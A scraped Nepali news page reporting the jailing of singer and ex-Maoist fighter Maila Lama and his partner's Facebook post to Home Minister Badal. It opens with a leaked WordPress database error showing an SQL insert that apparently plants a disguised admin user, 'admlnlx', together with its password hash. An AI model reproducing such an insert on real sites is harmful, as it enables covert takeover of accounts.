WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BtHymWewctajH3qxIgVjAtobv16cCm1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-05 07:20:14', '', 'admlnlx', 'admlnlx')
गाउँले न्युज, ८ साउन, काठमाण्डौ । लोकप्रिय जनगायक तथा जनयुद्धका जिउदो सहिद बर्तमान नेपाल कम्युनिष्ट पार्टि विप्लम समूका उपत्यका ब्यूरो इन्र्चा माईला लामा हिजो (मंगलबार) पुर्वपक्षका लागि जेल चलान गरिएको छ ।
माईला लामालाई ललितपुर जिल्ला अदालतले जेल चलान गरेको हो । जनयुद्धका आफ्नै कमाण्डर राम बहादुर थापा बादल गृह मन्त्रि हुदा आफ्नै सहकर्मिलाई दमन गरेको भन्दै गृह मान्त्रिको आलेचना भईरहेको छ ।
जन युद्धमा नेता माईला लामाले आफ्नो हातको औला, सुन्न सक्ने र देख्न सक्ने शक्ति गुमाईसकेको छ । आफ्नै सहयोद्धाले मान्छे मारेको अभियोगमा माईला लामालाई जेल चनाल गरे पछि माईला लामाका जिवनसाथी मनु तामाङले गृह मन्त्रि थापालाई सम्बोधन गर्दै फेसबुकमा आक्रोसित स्टाट लेखे ।
राम बहादुर थापा बादल गृह मन्त्रि भए पछि शुभकामना दिन जादाकने फोटा राखेर लेखिएको स्टाटस यस्तो छ “बादल दाइ ! यदि हजुरको भन्दा मेरो लास पछि परेँ भने पक्कै पुस्प गुच्छा लिएर आउनेछु, हजुरको कार्यकाल सफल होस” ।